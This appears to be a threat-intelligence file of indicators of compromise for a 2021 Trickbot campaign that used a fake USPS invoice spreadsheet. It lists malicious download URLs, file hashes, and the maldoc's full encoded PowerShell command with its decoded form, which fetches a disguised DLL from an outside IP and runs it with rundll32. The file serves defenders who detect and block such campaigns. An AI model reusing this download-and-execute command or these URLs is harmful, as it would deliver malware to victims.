-
Notifications
You must be signed in to change notification settings - Fork 84
/
2021-10-20 Trickbot IOCs
41 lines (30 loc) · 1.27 KB
/
2021-10-20 Trickbot IOCs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
THREAT ATTRIBUTION: TRICKBOT
SUBJECTS OBSERVED
USPS Invoice
SENDERS OBSERVED
MALDOC DOWNLOAD URLS
https://uniga.ac.id/wptracking/tracking2/tracking/tracking.php
MALDOC FILE HASHES
USPS_invoice_EA19788988US.xlsm
83b9a16d756ce3c82311412f0db65e4b
POWERSHELL COMMANDS FROM MALDOC
cmd.exe [2640]
"C:\Windows\System32\cmd.exe" /c start /B /WAIT powershell -enc IABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvADkANAAuADEANAAwAC4AMQAxADIALgAxADUALwBpAG0AYQBnAGUAcwAvAHkAZQBsAGwAbwB3AGIAaQBrAGUALgBwAG4AZwAiACAALQBPAHUAdABGAGkAbABlACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYgAuAGQAbABsACIA & start C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,DorntErl
Decodes to:
Invoke-WebRequest -Uri "http://94.140.112.15/images/yellowbike.png" -OutFile "C:\ProgramData\clb.dll"
TRICKBOT PAYLOAD DOWNLOAD URL
http://94.140.112.15/images/yellowbike.png
TRICKBOT PAYLOAD FILE HASHES
URL was down
TRICKBOT GTAG
gtag: Unknown
TRICKBOT C2s
No C2 traffic was observed.
SUPPORTING EVIDENCE
https://urlhaus.abuse.ch/url/1698134/
https://www.virustotal.com/gui/file/7c71832b07e2b4b3fcd36b6cb7b129a325974feab411369cb7674425dcb144ed